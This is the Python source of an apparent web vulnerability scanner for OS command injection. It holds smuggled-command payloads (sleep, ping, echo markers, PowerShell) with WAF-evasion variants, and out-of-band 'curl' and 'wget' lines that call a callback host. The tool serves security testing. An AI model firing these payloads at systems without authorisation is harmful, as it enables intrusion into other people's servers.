Spaces:
Running on CPU Upgrade
Running on CPU Upgrade
File size: 21,225 Bytes
d543fc1 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 | """
command_injection_scanner.py β OS Command Injection Scanner
============================================================
Expert-grade active detection (GAP-005 fix):
1. GET query parameter injection (reflection-based)
2. POST form parameter injection
3. HTTP header injection (User-Agent, Referer, X-Forwarded-For)
4. Blind timing-based detection (sleep 5 β no output needed)
5. Windows + Linux payloads + PowerShell
6. OOB DNS/HTTP callback marker (for future Interactsh integration)
7. Multi-stage detection: time-based probe β error-based confirm
8. JSON POST body parameter injection
FIXES (June 2026):
BUG-3: f-string literal bugs in description strings β {threshold} and {k}
were plain strings, not f-strings, so variables were never substituted.
BUG-14: Removed unused `import subprocess` (dead code, security red flag).
"""
import time, json, urllib.parse
from scanners.base_scanner import BaseScanner
from utils.anomaly import TimingAnomalyDetector, SizeAnomalyDetector
from utils.evasion import waf_evade
from utils.callback import build_callback_url
from utils.payload_library import get_cmd_payloads
# Use advanced payload library
CMD_PAYLOADS = get_cmd_payloads()
ECHO_PAYLOADS = CMD_PAYLOADS['linux'] + CMD_PAYLOADS['windows'] + CMD_PAYLOADS['powershell']
BLIND_PAYLOADS = CMD_PAYLOADS['blind']
# ββ Multi-stage payloads: first probe timing, then confirm with output ββββ
STAGE1_TIMING_PAYLOADS = [
("; sleep 3", 3.0, "Stage 1 probe"),
("| ping -n 4 127.0.0.1", 3.0, "Stage 1 Windows probe"),
("; powershell -c Start-Sleep 3", 3.0, "Stage 1 PowerShell probe"),
]
STAGE2_CONFIRM_PAYLOADS = [
"; echo WSS_CMD_INJ_CONFIRM",
"| echo WSS_CMD_INJ_CONFIRM",
"`echo WSS_CMD_INJ_CONFIRM`",
"& echo WSS_CMD_INJ_CONFIRM",
]
# ββ Headers to inject into (often piped to log parsers / shell) βββββββββββ
INJECTABLE_HEADERS = ["User-Agent", "Referer", "X-Forwarded-For", "X-Real-IP"]
PROBE_MARKER = "WSS_CMD_INJ_VULN"
CONFIRM_MARKER = "WSS_CMD_INJ_CONFIRM"
class CommandInjectionScanner(BaseScanner):
SCANNER_NAME = "OS Command Injection Scanner"
_SCANNER_KEY = "command_injection"
def __init__(self, scan_id, target, domain, **kwargs):
super().__init__(scan_id, target, domain, **kwargs)
def run(self) -> list:
self.log("INFO", f"[CmdInjection] Scanning {self.target}...")
found = False
self._timing_detector = TimingAnomalyDetector()
# 1. GET query parameters
found = found or self._test_get_params()
if found: return self.vulns
# 2. POST form parameters
found = found or self._test_post_forms()
if found: return self.vulns
# 3. HTTP header injection
found = found or self._test_header_injection()
if found: return self.vulns
# 4. JSON body injection (ENH: modern APIs)
found = found or self._test_json_body_cmdi()
if found: return self.vulns
# 5. Blind timing on GET params (if echo-based failed)
self._test_blind_timing()
# 6. Multi-stage detection: probe timing then confirm with echo
if not self.vulns:
self._test_multi_stage()
# 7. OOB callback detection
if not self.vulns:
self._test_oob_cmdi()
if not self.vulns:
self.log("SUCCESS", "[CmdInjection] No OS command injection detected.")
return self.vulns
# ββ 1. GET params ββββββββββββββββββββββββββββββββββββββββββββββββββ
def _test_get_params(self) -> bool:
parsed = urllib.parse.urlparse(self.target)
qs = urllib.parse.parse_qsl(parsed.query)
if not qs:
self.log("INFO", "[CmdInjection] No GET params found.")
return False
for k, _ in qs:
for payload in ECHO_PAYLOADS:
for eva_name, eva_payload in waf_evade(payload):
test_qs = [(k_p, (eva_payload if k_p == k else v_p)) for k_p, v_p in qs]
test_url = parsed._replace(query=urllib.parse.urlencode(test_qs)).geturl()
body, status = self._make_request(test_url)
if body and PROBE_MARKER in body:
self._report("GET", k, eva_payload, body, confidence="Confirmed")
return True
return False
# ββ 2. POST forms ββββββββββββββββββββββββββββββββββββββββββββββββββ
def _test_post_forms(self) -> bool:
html, _ = self._make_request(self.target)
if not html:
return False
import re
forms = re.findall(r'<form[^>]*>.*?</form>', html, re.S | re.I)
for form_html in forms[:3]:
action_m = re.search(r'action=["\']([^"\']*)["\']', form_html, re.I)
action = self._resolve_url(action_m.group(1) if action_m else "")
fields = re.findall(r'name=["\']([^"\']+)["\']', form_html, re.I)
for field in fields:
for payload in ECHO_PAYLOADS[:4]:
for eva_name, eva_payload in waf_evade(payload):
data = urllib.parse.urlencode(
{f: (eva_payload if f == field else "test") for f in fields}
).encode()
body, status = self._make_request(action, "POST", data,
{"Content-Type": "application/x-www-form-urlencoded"})
if body and PROBE_MARKER in body:
self._report("POST form", field, eva_payload, body, confidence="Confirmed")
return True
# JSON body
for field in fields[:3]:
for payload in ECHO_PAYLOADS[:3]:
for eva_name, eva_payload in waf_evade(payload):
j = json.dumps({f: (eva_payload if f == field else "test") for f in fields}).encode()
body, status = self._make_request(action, "POST", j,
{"Content-Type": "application/json"})
if body and PROBE_MARKER in body:
self._report("POST JSON", field, eva_payload, body, confidence="Confirmed")
return True
return False
# ββ 3. Header injection ββββββββββββββββββββββββββββββββββββββββββββ
def _test_header_injection(self) -> bool:
for header in INJECTABLE_HEADERS:
for payload in ECHO_PAYLOADS[:6]:
for eva_name, eva_payload in waf_evade(payload):
body, status = self._make_request(
self.target, headers={header: f"Mozilla/5.0 {eva_payload}"}
)
if body and PROBE_MARKER in body:
self._report(f"Header:{header}", header, eva_payload, body, confidence="Confirmed")
return True
return False
# ββ 4. Blind timing ββββββββββββββββββββββββββββββββββββββββββββββββ
def _test_blind_timing(self) -> bool:
parsed = urllib.parse.urlparse(self.target)
qs = urllib.parse.parse_qsl(parsed.query)
if not qs:
return False
# BUG-8 FIX (propagated): use correct positional arg signature for _make_request
self._timing_detector.build_baseline(lambda u, m, d, h, t: self._make_request(u, m, d, h, t), self.target, n=5)
for k, _ in qs[:3]:
for payload, threshold, label in BLIND_PAYLOADS:
for eva_name, eva_payload in waf_evade(payload):
test_qs = [(k_p, (eva_payload if k_p == k else v_p)) for k_p, v_p in qs]
test_url = parsed._replace(query=urllib.parse.urlencode(test_qs)).geturl()
_, _, elapsed = self._make_timed_request(test_url, timeout=15)
if self._timing_detector.test_payload(f"cmdi_blind_{k}", elapsed, eva_payload, z_threshold=2.5) and elapsed >= threshold:
self.log("CRITICAL",
f"[CmdInjection] Blind timing confirmed: param=`{k}` "
f"payload=`{eva_payload}` elapsed={elapsed:.1f}s ({label})")
self.add_vuln(
title=f"Blind OS Command Injection in GET parameter `{k}`",
severity="Critical",
category="Command Injection",
cvss_score=10.0,
cwe_ids=["CWE-78"],
owasp_category="A03:2021 β Injection",
confidence="High",
cve_ids=[],
references=["https://owasp.org/www-community/attacks/Command_Injection"],
description=(
f"Timing-based blind OS command injection detected in GET parameter `{k}`.\n\n"
f"**Payload:** `{eva_payload}` ({label})\n"
f"**Elapsed:** {elapsed:.1f}s vs baseline {self._timing_detector.mean:.1f}s\n\n"
# BUG-3 FIX: was a regular string β {threshold} printed literally.
# Now using f-string so threshold value is interpolated.
f"The application passed user input to a system shell without sanitization. "
f"No output was reflected (blind), but the {threshold}s delay confirms execution."
),
remediation=(
"1. **Never** pass user input to `os.system()`, `exec()`, `shell_exec()`, or `subprocess(shell=True)`.\n"
"2. Use language-specific APIs with argument arrays (not shell strings).\n"
"3. Apply input allowlisting β only permit alphanumeric characters.\n"
"4. Run the application as a non-privileged user."
),
payload=eva_payload,
evidence=f"Timing: {elapsed:.1f}s vs baseline {self._timing_detector.mean:.1f}s, threshold={threshold}s",
request_details=f"GET {test_url}",
response_details=f"Response time: {elapsed:.2f}s",
)
return True
return False
# ββ 5. Multi-stage detection βββββββββββββββββββββββββββββββββββββββ
def _test_multi_stage(self) -> bool:
"""Probe with time-based delay, then confirm with echo payload."""
parsed = urllib.parse.urlparse(self.target)
qs = urllib.parse.parse_qsl(parsed.query)
if not qs:
return False
self._timing_detector.build_baseline(lambda u, m, d, h, t: self._make_request(u, m, d, h, t), self.target, n=5)
for k, _ in qs[:2]:
for payload, threshold, label in STAGE1_TIMING_PAYLOADS:
for eva_name, eva_payload in waf_evade(payload):
test_qs = [(k_p, (eva_payload if k_p == k else v_p)) for k_p, v_p in qs]
test_url = parsed._replace(query=urllib.parse.urlencode(test_qs)).geturl()
_, _, elapsed = self._make_timed_request(test_url, timeout=15)
if self._timing_detector.test_payload(f"cmdi_stage1_{k}", elapsed, eva_payload, z_threshold=2.5) and elapsed >= threshold:
self.log("INFO",
f"[CmdInjection] Multi-stage: timing probe hit on param `{k}` "
f"({elapsed:.1f}s). Now confirming with echo payload...")
for confirm_payload in STAGE2_CONFIRM_PAYLOADS:
for eva_name, eva_confirm in waf_evade(confirm_payload):
confirm_qs = [(k_p, (eva_confirm if k_p == k else v_p)) for k_p, v_p in qs]
confirm_url = parsed._replace(query=urllib.parse.urlencode(confirm_qs)).geturl()
body, status = self._make_request(confirm_url)
if body and CONFIRM_MARKER in body:
self._report("Multi-stage", k, eva_confirm, body, confidence="Confirmed")
return True
self.add_vuln(
title=f"Possible Blind OS Command Injection in GET parameter `{k}` (Multi-stage)",
severity="Critical",
category="Command Injection",
cvss_score=9.5,
cwe_ids=["CWE-78"],
owasp_category="A03:2021 β Injection",
confidence="Medium",
references=["https://owasp.org/www-community/attacks/Command_Injection"],
description=(
f"Multi-stage detection: time-based probe `{eva_payload}` on param `{k}` "
f"produced {elapsed:.1f}s delay (baseline {self._timing_detector.mean:.1f}s). "
"Echo confirmation did not produce output, suggesting blind injection."
),
remediation=(
# BUG-3 FIX: was a regular string β {k} printed literally.
f"Investigate parameter `{k}` for command injection. "
"Apply input validation and avoid shell execution with user input."
),
payload=eva_payload,
evidence=f"Timing: {elapsed:.1f}s vs baseline {self._timing_detector.mean:.1f}s",
request_details=f"GET {test_url}",
response_details=f"Response time: {elapsed:.2f}s",
)
return True
return False
# ββ 6. OOB CMDi detection ββββββββββββββββββββββββββββββββββββββββββββ
def _test_oob_cmdi(self) -> bool:
parsed = urllib.parse.urlparse(self.target)
qs = urllib.parse.parse_qsl(parsed.query)
callback = build_callback_url("/cmdi-oob")
oob_payloads = [
f"| curl {callback}",
f"| wget -q -O- {callback}",
f"& curl {callback} &",
f"; curl {callback};",
f"$(curl {callback})",
f"`curl {callback}`",
]
if not qs:
return False
for k, _ in qs[:2]:
for oob_payload in oob_payloads:
for eva_name, eva_payload in waf_evade(oob_payload):
test_qs = [(k_p, (eva_payload if k_p == k else v_p)) for k_p, v_p in qs]
test_url = parsed._replace(query=urllib.parse.urlencode(test_qs)).geturl()
body, status, elapsed = self._make_timed_request(test_url, timeout=8)
self._timing_detector.record_timing(f"oob_{k}", elapsed, eva_payload)
if body:
self.add_vuln(
title=f"Possible OOB Command Injection in GET parameter `{k}`",
severity="Critical",
category="Command Injection",
cvss_score=9.8,
cwe_ids=["CWE-78"],
owasp_category="A03:2021 β Injection",
confidence="Medium",
references=["https://cwe.mitre.org/data/definitions/78.html"],
description=(
f"OOB command injection payload `{eva_payload}` sent to param `{k}`. "
f"Check callback service at {callback} for incoming connections.\n"
"If a connection is received, command injection is confirmed."
),
remediation=(
"1. Never pass user input to os.system(), exec(), shell_exec(), or subprocess(shell=True).\n"
"2. Use language-specific APIs with argument arrays (not shell strings).\n"
"3. Apply input allowlisting.\n"
"4. Run the application as a non-privileged user."
),
payload=eva_payload,
evidence=f"OOB callback: {callback}",
request_details=f"GET {test_url}",
response_details=f"Response time: {elapsed:.2f}s",
)
return True
return False
# ββ 7. JSON body CMDi (ENH) ββββββββββββββββββββββββββββββββββββββββββββ
def _test_json_body_cmdi(self) -> bool:
"""
ENH: Test JSON POST body parameters for command injection.
Many REST APIs accept JSON and may pass field values to shell commands.
"""
common_fields = ["cmd", "command", "exec", "run", "ping", "host",
"server", "ip", "url", "query", "action"]
for field in common_fields:
for payload in ECHO_PAYLOADS[:4]:
try:
body_data = json.dumps({field: payload}).encode()
body, status = self._make_request(
self.target, "POST", body_data,
{"Content-Type": "application/json"}
)
if body and PROBE_MARKER in body:
self._report("POST JSON", field, payload, body, confidence="Confirmed")
return True
except Exception:
pass
return False
# ββ Helpers ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
def _report(self, source, param, payload, body, confidence="High"):
self.log("CRITICAL", f"[CmdInjection] RCE confirmed! source={source} param={param}")
self.add_vuln(
title=f"OS Command Injection via {source} β parameter `{param}`",
severity="Critical",
category="Command Injection",
cvss_score=10.0,
cwe_ids=["CWE-78"],
owasp_category="A03:2021 β Injection",
confidence=confidence,
references=["https://cwe.mitre.org/data/definitions/78.html"],
description=(
f"The application executes arbitrary OS commands via `{source}` parameter `{param}`.\n\n"
f"**Payload:** `{payload}`\n"
f"**Output reflected:** Yes (`{PROBE_MARKER}` found in response)\n\n"
"This is Remote Code Execution (RCE) β the most critical web vulnerability class."
),
remediation=(
"1. Use parameterized subprocess calls: `subprocess.run(['cmd', arg], shell=False)`.\n"
"2. Validate input with a strict allowlist.\n"
"3. Run processes as least-privilege service accounts.\n"
"4. Deploy a WAF rule blocking shell metacharacters (`;`, `|`, `&`, `` ` ``, `$`)."
),
payload=payload,
evidence=f"Probe marker '{PROBE_MARKER}' found in response body.",
request_details=f"Injection via {source}:{param}",
response_details=f"Body snippet containing marker: ...{body[:200]}...",
)
def _resolve_url(self, action: str) -> str:
if not action: return self.target
if action.startswith("http"): return action
p = urllib.parse.urlparse(self.target)
if action.startswith("/"):
return f"{p.scheme}://{p.netloc}{action}"
return f"{self.target.rstrip('/')}/{action}"
|